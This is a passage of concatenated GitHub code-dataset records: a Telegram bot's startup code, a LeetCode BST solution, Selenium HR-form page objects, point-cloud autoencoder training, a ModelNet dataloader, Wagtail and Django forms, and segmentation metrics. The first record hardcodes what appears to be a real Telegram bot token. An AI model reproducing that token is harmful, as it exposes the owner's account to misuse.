Updater(\"5394324389:AAGvCQN8ogbnwj1MStLHmvu7Kb9e3uQiF_4\", use_context=True)\r\n dp = updater.dispatcher\r\n dp.add_handler(CommandHandler(\"start\", start))\r\n dp.add_handler(CommandHandler(com(), do_task))\r\n dp.add_handler(MessageHandler(Filters.text, msg_hand))\r\n dp.add_handler(CallbackQueryHandler(inline))\r\n print(\"Bot started\")\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nmain()\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n","repo_name":"pugalkmc/ad_bot_01","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16970952620","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def searchBST(self, root, val):\n \"\"\"\n :type root: TreeNode\n :type val: int\n :rtype: TreeNode\n \"\"\"\n return self.sol_2(root, val)\n\n def sol_1(self, root, val):\n while root:\n if root.val == val:\n return root\n elif root.val < val:\n root = root.right\n elif root.val > val:\n root = root.left\n\n # python 不写返回值就是None, 不需要这句\n # return None\n\n def sol_2(self, root, val):\n # 排除root为None的情况\n if not root:\n return None\n\n if root.val > val:\n return self.sol_2(root.left, val)\n elif root.val < val:\n return self.sol_2(root.right, val)\n else:\n return root\n\n\n\n\n\n\n","repo_name":"slimbloody/Leetcode","sub_path":"Python/700_Search_in_a_Binary_Search_Tree.py","file_name":"700_Search_in_a_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37063759667","text":"from datetime import datetime, timedelta\nfrom time import sleep\n\nfrom selenium.webdriver.common.by import By\n\nfrom test.common.page import Page\nfrom test.page.pro1_rz_pages.rz_login_page import RZLoginPage\nfrom utils.config import Config\n\n\nclass reApplyLocators(Page):\n \"\"\"\n 人资系统:加班申请界面使用的控件定位内容\n \"\"\"\n re_Apply_button = (By.XPATH,\"//img[starts-with(@id,'vp_hr_portal_myApply_web_JGImage5')]\")#调动申请按钮\n re_Imp_button = (By.XPATH,\"//*[contains(text(),'调入部门')]\")#调入部门弹框\n re_Choose_department = (By.XPATH, \"//*[contains(text(),'企业管理部')]\") # 选择调入的部门\n re_Imp_comfirm = (By.XPATH, \"//*[contains(text(),'确认')]\") # 调入部门确定按钮\n re_Imp_button_1 = (By.XPATH, \"//*[contains(text(),'调入职位')]\") # 调入职位弹框\n re_Imp_position = (By.XPATH, \"//*[contains(text(),'副总裁')]\") #调入职位\n re_Imp_comfirm_2 = (By.XPATH, \"//*[contains(text(),'确定')]\") # 调入职位确定按钮\n re_Reason = (By.XPATH, \"//textarea[@name='moveReason' and @class='JGFormTextError']\") #调动原因\n re_Add_button = (By.XPATH, \"//*[contains(text(),'新增')]\") # 新增按钮\n re_Deliver = (By.XPATH, \"//table[@class='listTable' and @width='610']/tbody/tr/td[2]\") #交接事项名称\n re_Deliver_IN = (By.XPATH, \"//input[@type='TEXT'and @name='contentName']\") # 交接事项内嵌框\n re_Deliver_content = (By.XPATH, \"//table[@class='listTable' and @width='610']/tbody/tr/td[3]\") #具体交接内容\n re_Deliver_content_IN = (By.XPATH, \"//input[@type='TEXT'and @name='content']\") # 具体交接内容内嵌框\n re_Submit_button = (By.XPATH, \"//*[contains(text(),'暂存')]\") # 暂存按钮\n\n\n\n def enter_reApply_button(self):\n '''调动申请按钮'''\n try:\n self.find_element(*self.re_Apply_button).click()\n except Exception as e:\n print('调动申请按钮未找到,原因%s'%e)\n\n def reApply_click_depart(self):\n '''点击调入部门'''\n try:\n self.find_element(*self.re_Imp_button).click()\n except Exception as e:\n print('选择调入部门按钮未找到,原因%s'%e)\n\n def reApplydepart(self):\n '''选择调入部门'''\n try:\n self.find_element(*self.re_Choose_department).click()\n self.find_element(*self.re_Imp_comfirm).click()\n except Exception as e:\n print('选择调入部门按钮未找到,原因%s'%e)\n\n def reApplyposition(self):\n '''输入调入职位'''\n try:\n self.find_element(*self.re_Imp_button_1).click()\n sleep(3)\n self.find_element(*self.re_Imp_position).click()\n self.find_element(*self.re_Imp_comfirm_2).click()\n except Exception as e:\n print('调入职位按钮未找到,原因%s' % e)\n\n def reApplyreason(self):\n '''输入调动原因'''\n return self.find_element(*self.re_Reason).send_keys(u'测试调动申请')\n\n def reApply_add(self):\n '''新增操作'''\n return self.find_element(*self.re_Add_button).click()\n\n def reApply_Deliver(self):\n '''输入交接事项名称'''\n try:\n self.find_element(*self.re_Deliver).click()\n self.find_element(*self.re_Deliver).click()\n self.find_element(*self.re_Deliver_IN).send_keys(u\"测试交接事项名称\")\n except Exception as e:\n print('输入交接事项名称未找到,原因%s' % e)\n\n def reApply_Deliver_content(self):\n '''输入具体交接内容'''\n try:\n self.find_element(*self.re_Deliver_content).click()\n self.find_element(*self.re_Deliver_content).click()\n self.find_element(*self.re_Deliver_content_IN).send_keys(u\"测试具体交接内容\")\n except Exception as e:\n print('具体交接内容未找到,原因%s' % e)\n\n def reApply_Submit(self):\n '''暂存按钮'''\n try:\n self.find_element(*self.re_Submit_button).click()\n except Exception as e:\n print('无法定位暂存按钮 %s' %e)\n\nif __name__ == '__main__':\n URL = Config().get('URL')\n page = RZLoginPage(browser_type='Chrome').get(URL, maximize_window=False)\n page.userlogin()\n result = reApplyLocators(page)\n result.enter_reApply_button()\n sleep(2)\n result.reApply_click_depart()\n sleep(2)\n result.reApplydepart()\n sleep(4)\n result.reApplyposition()\n sleep(2)\n result.reApplyreason()\n sleep(2)\n result.reApply_add()\n sleep(2)\n result.reApply_Deliver()\n sleep(2)\n result.reApply_Deliver_content()\n sleep(2)\n result.reApply_Submit()\n\n\n\n\n\n\n\n\n","repo_name":"Jacessw/Test_rz","sub_path":"test/page/pro1_rz_pages/rz_reApply_page.py","file_name":"rz_reApply_page.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30788051603","text":"\"\"\"\nThe purpose of this strategy is to train an AE on the reconstruction task, in order to learn\na feature representation of the input data. \nThe encoded features are then used as input to a classifier.\n\nWe first test the pointcloud dataset: folding net as AE for point cloud reconstruction\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nimport warnings \nwarnings.filterwarnings(\"ignore\")\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os, glob\nfrom tqdm import tqdm\n\n#DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nDEVICE = torch.device(\"cpu\")\n\ndef train_one_epoch(train_loader, model, optimizer, loss_fn, model_name):\n losses = []\n for ref_cloud in tqdm(train_loader):\n ref_cloud = ref_cloud[0] # the second element in the list is the label, but we dont need it now \n ref_cloud = ref_cloud.to(DEVICE)\n optimizer.zero_grad()\n if model_name == 'convAE':\n batch_size = ref_cloud.shape[0]\n decoded, encoded = model(ref_cloud, batch_size)\n else:\n decoded, encoded = model(ref_cloud)\n # get_loss is a function of net\n loss = loss_fn(ref_cloud, decoded)\n # loss = model.get_loss(ref_cloud, decoded)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n\n return np.mean(losses)\n\n\ndef test_one_epoch(test_loader, model, loss_fn, model_name):\n model.eval()\n losses = []\n\n with torch.no_grad():\n for ref_cloud in tqdm(test_loader):\n ref_cloud = ref_cloud[0]\n ref_cloud = ref_cloud.to(DEVICE)\n\n if model_name == 'convAE':\n batch_size = ref_cloud.shape[0]\n decoded, encoded = model(ref_cloud, batch_size)\n else:\n decoded, encoded = model(ref_cloud)\n loss = loss_fn(ref_cloud, decoded)\n # loss = model.get_loss(ref_cloud, decoded)\n losses.append(loss.item())\n model.train()\n \n return np.mean(losses)\n\n\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, default=32)\nparser.add_argument('--epochs', type=int, default=100, help='Number of epochs')\nparser.add_argument('--checkpoints_path', type=str, default='../checkpoints')\nparser.add_argument('--ndata', type=int, default=4000, help='Number of data ')\nparser.add_argument('--npoints', type=int, default=4000, help='Number of points per cloud')\nparser.add_argument('--train', type=bool, default=False, help='Train or test')\nparser.add_argument('--model_name', type=str , default='vox', help='foldingnet or vox', choices=['foldingnet', 'vox', 'convAE'])\n\nargs = parser.parse_args()\n\n\ndef main(\n batch_size=32,\n epochs=100,\n checkpoints_path='../checkpoints',\n ndata=4000,\n npoints=5000,\n train=True,\n model_name='foldingnet'\n ):\n checkpoints_path = os.path.join(checkpoints_path, model_name)\n\n ############## LOAD MODEL AND DEFINE LEARNING SCENARIO ################\n from FoldingNet import FoldNet, Encoder, Decoder\n from voxel_ae import voxAutoEncoder\n from ch_loss import ChamferLoss\n\n\n import pandas as pd\n test_losses, train_losses = [], []\n\n print ('='*20, 'LOADING MODEL', '='*20)\n print (f\"Model path {checkpoints_path}\")\n ############## LOAD PREVIOUS INFORMATIONS ################\n # load results if exists\n if os.path.exists(os.path.join(checkpoints_path, 'train_loss.txt')):\n train_losses = np.loadtxt(os.path.join(checkpoints_path, 'train_loss.txt'))\n train_losses = train_losses.tolist()\n\n if os.path.exists(os.path.join(checkpoints_path, 'val_loss.txt')):\n test_losses = np.loadtxt(os.path.join(checkpoints_path, 'val_loss.txt'))\n test_losses = test_losses.tolist()\n\n # create save folder if not exists\n if not os.path.exists(checkpoints_path):\n os.makedirs(checkpoints_path)\n\n\n ############## LOAD DATA ################\n import sys\n sys.path.append('../')\n from dataset.PointCloudDataset import PointCloudDataset\n from dataset.voxelDataset import VoxelDataset\n\n\n print ('='*20, 'LOADING DATA', '='*20)\n\n if model_name == 'foldingnet':\n dataset_train = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=True, \n ndata=4000,\n file_extension='.txt', \n npoints=npoints\n )\n dataset_val = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=False, \n ndata=2000,\n file_extension='.txt', \n npoints=npoints\n )\n\n # sample ndata points from each cloud\n np.random.seed(0)\n dataset_train = torch.utils.data.Subset(dataset_train, np.random.choice(len(dataset_train), ndata, replace=False))\n dataset_val = torch.utils.data.Subset(dataset_val, np.random.choice(len(dataset_val), int(ndata/20), replace=False)) \n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n\n # # model = FoldNet(num_points=npoints).to(DEVICE)\n # from convAE import AutoEncoder\n # model = AutoEncoder(npoints, batch_size=batch_size).to(DEVICE)\n\n model = FoldNet(num_points=npoints).to(DEVICE)\n \n elif model_name == 'vox':\n input_shape = (32, 32, 32)\n dataset_train = VoxelDataset('../dataset/ModelNet40', \n train=True, \n )\n dataset_val = VoxelDataset('../dataset/ModelNet40', \n train=False, \n )\n\n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n \n model = voxAutoEncoder(input_shape).to(DEVICE)\n\n elif model_name == 'convAE':\n dataset_train = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=True, \n ndata=4000,\n file_extension='.txt', \n npoints=npoints\n )\n dataset_val = PointCloudDataset('../dataset/modelnet40_normal_resampled', \n train=False, \n ndata=2000,\n file_extension='.txt', \n npoints=npoints\n )\n\n # sample ndata points from each cloud\n np.random.seed(0)\n dataset_train = torch.utils.data.Subset(dataset_train, np.random.choice(len(dataset_train), ndata, replace=False))\n dataset_val = torch.utils.data.Subset(dataset_val, np.random.choice(len(dataset_val), int(ndata/20), replace=False)) \n\n print (f\"Train dataset size: {len(dataset_train)}\")\n print (f\"Val dataset size: {len(dataset_val)}\")\n\n from convAE import AutoEncoder\n model = AutoEncoder(npoints).to(DEVICE)\n\n\n # load model if exists\n models_saved = glob.glob(os.path.join(checkpoints_path, 'model_*.pth'))\n if len(models_saved) > 0:\n # get most recent model\n epoches_done = max([int(m.split('_')[-1].split('.')[0]) for m in models_saved])\n model_path = os.path.join(checkpoints_path, f'model_{epoches_done}.pth')\n print(f\"Loading model from {model_path}\")\n model.load_state_dict(torch.load(model_path))\n else:\n epoches_done = 0\n\n \n from torch.utils.data import DataLoader, SubsetRandomSampler\n ndata = 1000\n # subset of dataloader\n train_loader = DataLoader(dataset_train, batch_size=batch_size, num_workers=4, shuffle=True)\n test_loader = DataLoader(dataset_val, batch_size=32, num_workers=4, shuffle=False)\n\n ############## TRAINING ################\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-6)\n loss_fn = None\n if model_name in ['foldingnet' , 'convAE']:\n print ('='*20, 'USING CHAMFER LOSS', '='*20)\n from ch_loss import ChamferLoss\n loss_fn = ChamferLoss()\n\n \n elif model_name == 'vox':\n print ('='*20, 'USING MSE LOSS', '='*20)\n loss_fn = nn.MSELoss()\n\n if train:\n print ('='*20, 'TRAINING', '='*20)\n for epoch in range(epoches_done, epoches_done+epochs+1):\n print('=' * 20, epoch + 1, '=' * 20)\n tloss = train_one_epoch(train_loader, model, optimizer, loss_fn, model_name)\n vloss= test_one_epoch(test_loader, model, loss_fn, model_name)\n print('Epoch: {}, train loss: {:.4f}, val loss: {:.4f}'.format(epoch, tloss, vloss))\n\n train_losses.append(tloss)\n test_losses.append(vloss)\n \n # save model\n saved_path = os.path.join(checkpoints_path, \"model_{}.pth\".format(epoch))\n torch.save(model.state_dict(), saved_path)\n\n # save losses \n np.savetxt(os.path.join(checkpoints_path, 'train_loss.txt'), train_losses)\n np.savetxt(os.path.join(checkpoints_path, 'val_loss.txt'), test_losses)\n\n else:\n print ('=' * 20, 'TESTING', '=' * 20)\n loss = test_one_epoch(test_loader, model, loss_fn, model_name)\n print('Test loss: {:.4f}'.format(loss))\n\n\n\nif __name__ == '__main__':\n main( **vars(args))","repo_name":"NicolaZomer/3D-Object-Classification","sub_path":"autoencoder_strategy/trainAE.py","file_name":"trainAE.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9540806838","text":"import os, sys\nimport time\nimport numpy as np\nimport torch.utils.data as data\nimport torch\nfrom PIL import Image\n\nnp.random.seed(2022)\nfrom lib.utils.logger import print_and_log_info\nfrom lib.dataloader import image_utils, utils, augmentation\nfrom lib.dataset.modelNet import dataloader_utils\nnames = [\"cad_name\", \"img_full_path\", \"delta_rotation\", \"delta_uv\", \"delta_depth\",\n \"rotation_first_frame\", \"uv_first_frame\", \"depth_first_frame\",\n \"gt_rotations\", \"gt_translations\"]\n\n\nclass ModelNet(data.Dataset):\n def __init__(self, root_dir, split, config_training, logger, is_master):\n self.is_master = is_master\n self.logger = logger\n self.root_dir = root_dir\n self.split = split\n self.use_augmentation = config_training.use_augmentation\n self.image_size = config_training.image_size\n self.save_path = config_training.save_path\n self.debug_mode = config_training.debug_mode # debugging mode (to visualize samples and loader quickly)\n\n self.sequence_data = self.get_data_from_split_name()\n if self.is_master:\n print_and_log_info(self.logger,\n \"Size of dataloader: {}\".format(sys.getsizeof(self.sequence_data) / (10 ** 9)))\n print_and_log_info(self.logger, \"Len of dataset :{}\".format(self.__len__()))\n self.save_random_sequences()\n\n def __len__(self):\n return len(self.sequence_data[\"img_full_path\"])\n\n def get_data_from_split_name(self):\n start_time = time.time()\n list_files = os.path.join(self.root_dir, self.split + \".txt\")\n with open(list_files, 'r') as f:\n list_id_model = [x.strip() for x in f.readlines()]\n if self.debug_mode:\n list_id_model = list_id_model[:500]\n\n sequence_data = {names[i]: [] for i in range(len(names))}\n for id_model in list_id_model:\n path_trajectory = os.path.join(self.root_dir, id_model)\n sequence_obj = dataloader_utils.SequenceProcessing(root_path=path_trajectory, dataset_name=\"modelNet\")\n gt_sequence_obj = sequence_obj.create_gt_tracking()\n sequence_data[\"img_full_path\"].extend(sequence_obj.create_list_img_path())\n sequence_data[\"cad_name\"].extend([id_model for _ in range(len(sequence_obj.create_list_img_path()))])\n for name in names[2:]:\n sequence_data[name].extend(gt_sequence_obj[name])\n if str(self.split).endswith(\"train\"):\n print(\"Shuffling data before training...\")\n sequence_data = utils.shuffle_dictionary(sequence_data)\n if self.is_master:\n print_and_log_info(self.logger, \"Loading dataLoader takes {} seconds\".format(time.time() - start_time))\n return sequence_data\n\n def _fetch_sequence(self, img_path, save_path=None):\n sequence_img, list_bbox = [], []\n for i in range(2):\n img = image_utils.open_image(img_path[i])\n sequence_img.append(img)\n list_bbox.append(np.asarray(img.getbbox()))\n # take max bbox of two images\n bbox_sequence = np.zeros(4)\n bbox_sequence[0] = np.min([list_bbox[0][0], list_bbox[1][0]])\n bbox_sequence[1] = np.min([list_bbox[0][1], list_bbox[1][1]])\n bbox_sequence[2] = np.max([list_bbox[0][2], list_bbox[1][2]])\n bbox_sequence[3] = np.max([list_bbox[0][3], list_bbox[1][3]])\n\n bbox_size = np.max([bbox_sequence[2] - bbox_sequence[0], bbox_sequence[3] - bbox_sequence[1]])\n max_size_with_margin = bbox_size * 1.3 # margin = 0.2 x max_dim\n margin = bbox_size * 0.15\n bbox_sequence = bbox_sequence + np.array([-margin, -margin, margin, margin])\n bbox_sequence_square = image_utils.make_bbox_square(bbox_sequence, max_size_with_margin)\n ratio = self.image_size / max_size_with_margin # keep this value to predict translation later\n for i in range(2):\n cropped_img = sequence_img[i].crop(bbox_sequence_square)\n cropped_resized_img = cropped_img.resize((self.image_size, self.image_size), Image.ANTIALIAS)\n sequence_img[i] = cropped_resized_img\n if \"train\" in self.split and self.use_augmentation:\n sequence_img = augmentation.apply_data_augmentation(2, sequence_img)\n if save_path is None:\n seq_img = np.zeros((2, 3, self.image_size, self.image_size))\n for i in range(2):\n seq_img[i] = image_utils.normalize(sequence_img[i].convert(\"RGB\"))\n return seq_img, ratio, bbox_sequence_square\n else:\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n for i in range(2):\n sequence_img[i].save(os.path.join(save_path, \"frame_{:02d}.png\".format(i)))\n\n def __getitem__(self, index):\n seq_img_path = self.sequence_data[\"img_full_path\"][index]\n cad_name = self.sequence_data[\"cad_name\"][index]\n seq_img, ratio, bbox_sequence_square = self._fetch_sequence(seq_img_path)\n data_batch = {names[i]: [] for i in range(1, len(names))}\n for name in names[2:]:\n tmp = self.sequence_data[name][index]\n if name == \"delta_uv\":\n tmp = tmp * ratio / (self.image_size / 2)\n elif name == \"delta_depth\":\n tmp = tmp * ratio\n data_batch[name] = torch.from_numpy(np.ascontiguousarray(tmp)).float()\n seq_img = torch.from_numpy(np.ascontiguousarray(seq_img)).float()\n ratio = torch.from_numpy(np.ascontiguousarray(ratio)).float()\n bbox_sequence_square = torch.from_numpy(np.ascontiguousarray(bbox_sequence_square)).float()\n data_batch = dict(seq_img=seq_img,\n ratio=ratio,\n cad_name=cad_name,\n bbox_sequence_square=bbox_sequence_square,\n delta_rotation=data_batch[\"delta_rotation\"],\n delta_uv=data_batch[\"delta_uv\"],\n delta_depth=data_batch[\"delta_depth\"],\n rotation_first_frame=data_batch[\"rotation_first_frame\"],\n uv_first_frame=data_batch[\"uv_first_frame\"],\n depth_first_frame=data_batch[\"depth_first_frame\"],\n gt_rotations=data_batch[\"gt_rotations\"],\n gt_translations=data_batch[\"gt_translations\"],\n img_path=seq_img_path[0])\n return data_batch\n\n def save_random_sequences(self):\n print_and_log_info(self.logger, \"Saving training samples at {}\".format(self.save_path))\n list_index = np.unique(np.random.randint(0, self.__len__(), 10))\n for index in list_index:\n save_sequence_path = os.path.join(self.save_path, \"{:06d}\".format(index))\n self._fetch_sequence(self.sequence_data[\"img_full_path\"][index], save_sequence_path)","repo_name":"nv-nguyen/pizza","sub_path":"lib/dataset/modelNet/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"40"} +{"seq_id":"28219015455","text":"from django.forms import widgets\nfrom modelcluster.fields import ParentalKey\nfrom wagtail.wagtailadmin.edit_handlers import (FieldPanel, FieldRowPanel, \n InlinePanel, MultiFieldPanel)\nfrom wagtail.wagtailcore.fields import RichTextField\nfrom wagtail.wagtailforms.models import AbstractEmailForm, AbstractFormField\n\n\nclass FormField(AbstractFormField):\n page = ParentalKey('FormPage', related_name='form_fields')\n\n\nclass FormPage(AbstractEmailForm):\n intro = RichTextField(blank=True)\n thank_you_text = RichTextField(blank=True)\n\n content_panels = AbstractEmailForm.content_panels + [\n FieldPanel('intro', classname=\"full\"),\n InlinePanel('form_fields', label=\"Form fields\"),\n FieldPanel('thank_you_text', classname=\"full\"),\n MultiFieldPanel([\n FieldRowPanel([\n FieldPanel('from_address', classname=\"col6\"),\n FieldPanel('to_address', classname=\"col6\"),\n ]),\n FieldPanel('subject'),\n ], \"Email\"),\n ]\n\n def get_form(self, *args, **kwargs):\n form = super().get_form(*args, **kwargs)\n # iterate through the fields in the generated form\n for name, field in form.fields.items():\n # if the field is a TextArea - adjust the columns \n if isinstance(field.widget, widgets.Textarea):\n field.widget.attrs.update({'cols': '5'})\n return form\n\n","repo_name":"jkang8/jk","sub_path":"contact/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31898300767","text":"from django import forms\nfrom .models import Bookmark, Category\n\n\nclass BookmarkForm(forms.ModelForm):\n description = forms.CharField(widget=forms.Textarea(attrs={'rows': 2}), required=False)\n\n class Meta:\n model = Bookmark\n fields = ['title', 'link', 'category', 'description', 'safe']\n\n\nclass CategoryForm(forms.ModelForm):\n class Meta:\n model = Category\n fields = ['name', 'description', ]","repo_name":"oussama-he/prodUtils","sub_path":"bookmark/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3052965251","text":"import os\nfrom math import ceil\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.autograd import Variable\n\n\ndef check_mkdir(dir_name):\n if not os.path.exists(dir_name):\n os.mkdir(dir_name)\n\n\ndef initialize_weights(*models):\n for model in models:\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.BatchNorm2d):\n module.weight.data.fill_(1)\n module.bias.data.zero_()\n\n\ndef get_upsampling_weight(in_channels, out_channels, kernel_size):\n factor = (kernel_size + 1) // 2\n if kernel_size % 2 == 1:\n center = factor - 1\n else:\n center = factor - 0.5\n og = np.ogrid[:kernel_size, :kernel_size]\n filt = (1 - abs(og[0] - center) / factor) * (1 - abs(og[1] - center) / factor)\n weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size), dtype=np.float64)\n weight[list(range(in_channels)), list(range(out_channels)), :, :] = filt\n return torch.from_numpy(weight).float()\n\n\nclass CrossEntropyLoss2d(nn.Module):\n def __init__(self, weight=None, size_average=True, ignore_index=255):\n super(CrossEntropyLoss2d, self).__init__()\n self.nll_loss = nn.NLLLoss2d(weight, size_average, ignore_index)\n\n def forward(self, inputs, targets):\n return self.nll_loss(F.log_softmax(inputs), targets)\n\n\nclass FocalLoss2d(nn.Module):\n def __init__(self, gamma=2, weight=None, size_average=True, ignore_index=255):\n super(FocalLoss2d, self).__init__()\n self.gamma = gamma\n self.nll_loss = nn.NLLLoss(weight, size_average, ignore_index)\n\n def forward(self, inputs, targets):\n return self.nll_loss((1 - F.softmax(inputs)) ** self.gamma * F.log_softmax(inputs), targets)\n\n\ndef _fast_hist(label_pred, label_true, num_classes):\n mask = (label_true >= 0) & (label_true < num_classes)\n hist = np.bincount(\n num_classes * label_true[mask].astype(int) +\n label_pred[mask], minlength=num_classes ** 2).reshape(num_classes, num_classes)\n return hist\n\n\ndef evaluate(predictions, gts, num_classes):\n hist = np.zeros((num_classes, num_classes))\n for lp, lt in zip(predictions, gts):\n hist += _fast_hist(lp.flatten(), lt.flatten(), num_classes)\n # axis 0: gt, axis 1: prediction\n acc = np.diag(hist).sum() / hist.sum()\n acc_cls = np.diag(hist) / hist.sum(axis=1)\n acc_cls = np.nanmean(acc_cls)\n iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))\n mean_iu = np.nanmean(iu)\n freq = hist.sum(axis=1) / hist.sum()\n fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()\n return acc, acc_cls, mean_iu, fwavacc\n\n\ndef jaccard(label_pred, label_gt, num_classes=1):\n sum_axis = tuple(range(len(label_gt.shape)))[1:]\n if num_classes == 1:\n\n product = np.multiply(label_pred, label_gt)\n intersection = np.sum(product, axis=sum_axis) + 1e-10\n # intersection = (np.sum(product, axis=sum_axis))\n union = (np.sum(np.square(label_gt), axis=sum_axis) + np.sum(np.square(label_pred), axis=sum_axis) - np.sum(product, axis=sum_axis) + 1e-10)\n return np.mean(intersection / union)\n else:\n label_pred = np.argmax(label_pred, axis=-3)\n jacc = np.zeros(num_classes)\n for c in range(num_classes):\n c_lbgt = (label_gt == c).astype(int)\n c_lbpred = (label_pred == c).astype(int)\n jacc[c] += (jaccard(c_lbpred, c_lbgt))\n return jacc\n\n\ndef count_pixels(label_pred, label_gt, num_classes=1, threshold=0.5):\n if num_classes == 1:\n label_pred[label_pred < threshold] = 0\n label_pred[label_pred >= threshold] = 1\n\n product = np.multiply(label_pred, label_gt)\n return np.sum(product), (np.sum(np.square(label_gt)) + np.sum(np.square(label_pred)) - np.sum(product))\n else:\n label_pred_sm = np.argmax(label_pred, axis=-3)\n num = np.zeros(num_classes)\n den = np.zeros(num_classes)\n for c in range(num_classes):\n c_lbgt = (label_gt == c).astype(int)\n c_lbpred = (label_pred_sm == c).astype(int)\n res = (count_pixels(c_lbpred, c_lbgt))\n num[c] += res[0]\n den[c] += res[1]\n return num, den\n\n\ndef count_pixels_multiclass(label_pred, label_gt, num_classes=1, threshold=0.5, ignore_label=255):\n classes_dummy = np.arange(num_classes)[None, :, None, None]\n label_gt = np.expand_dims(label_gt, axis=1)\n argmax_mask = (np.expand_dims(label_pred.argmax(axis=1), axis=1) == classes_dummy).astype(int)\n threshold_mask = np.where(label_pred > threshold, 1, 0)\n ignore_mask = np.where(label_gt != ignore_label, 1, 0)\n c_lbpred = np.multiply(argmax_mask, threshold_mask)\n c_lbgt = (label_gt == classes_dummy).astype(int)\n c_lbpred = np.multiply(c_lbpred, ignore_mask)\n c_lbgt = np.multiply(c_lbgt, ignore_mask)\n\n product = np.multiply(c_lbpred, c_lbgt)\n num = np.sum(product, axis=(0, 2, 3))\n den = (np.sum(c_lbgt, axis=(0, 2, 3)) + np.sum(c_lbpred, axis=(0, 2, 3)) -\n np.sum(product, axis=(0, 2, 3)))\n return num, den\n\n\ndef count_pixels_multiclass_gpu(label_pred, label_gt, num_classes=1, threshold=0.5, ignore_label=255, dims_to_keep=(1,)):\n assert label_pred.shape == label_gt.shape\n sum_axis = tuple([i for i in tuple(range(len(label_gt.shape))) if i not in dims_to_keep])\n threshold_mask = torch.where(label_pred > threshold, torch.tensor(1, device='cuda'), torch.tensor(0, device='cuda'))\n\n if num_classes != 1:\n classes_dummy = torch.arange(num_classes, device='cuda')[None, :, None, None]\n label_gt = torch.unsqueeze(label_gt, dim=1)\n argmax_mask = (torch.unsqueeze(label_pred.argmax(axis=1), dim=1) == classes_dummy).int()\n c_lbpred = argmax_mask * threshold_mask\n c_lbgt = (label_gt == classes_dummy).int()\n ignore_mask = torch.where(label_gt != ignore_label, torch.tensor(1, device='cuda'), torch.tensor(0, device='cuda'))\n c_lbpred = c_lbpred * ignore_mask\n c_lbgt = c_lbgt * ignore_mask\n else:\n c_lbpred = threshold_mask\n c_lbgt = label_gt\n\n product = c_lbpred * c_lbgt\n eps = 1e-6\n num = torch.sum(product, dim=sum_axis)\n den = (torch.sum(c_lbgt, dim=sum_axis) + torch.sum(c_lbpred, dim=sum_axis))\n return (num + eps) / (den - num + eps), (2 * num + eps) / (den + eps)\n\n\nclass AverageMeter(object):\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass PolyLR(object):\n def __init__(self, optimizer, curr_iter, max_iter, lr_decay):\n self.max_iter = float(max_iter)\n self.init_lr_groups = []\n for p in optimizer.param_groups:\n self.init_lr_groups.append(p['lr'])\n self.param_groups = optimizer.param_groups\n self.curr_iter = curr_iter\n self.lr_decay = lr_decay\n\n def step(self):\n for idx, p in enumerate(self.param_groups):\n p['lr'] = self.init_lr_groups[idx] * (1 - self.curr_iter / self.max_iter) ** self.lr_decay\n\n\n# just a try, not recommend to use\nclass Conv2dDeformable(nn.Module):\n def __init__(self, regular_filter, cuda=True):\n super(Conv2dDeformable, self).__init__()\n assert isinstance(regular_filter, nn.Conv2d)\n self.regular_filter = regular_filter\n self.offset_filter = nn.Conv2d(regular_filter.in_channels, 2 * regular_filter.in_channels, kernel_size=3,\n padding=1, bias=False)\n self.offset_filter.weight.data.normal_(0, 0.0005)\n self.input_shape = None\n self.grid_w = None\n self.grid_h = None\n self.cuda = cuda\n\n def forward(self, x):\n x_shape = x.size() # (b, c, h, w)\n offset = self.offset_filter(x) # (b, 2*c, h, w)\n offset_w, offset_h = torch.split(offset, self.regular_filter.in_channels, 1) # (b, c, h, w)\n offset_w = offset_w.contiguous().view(-1, 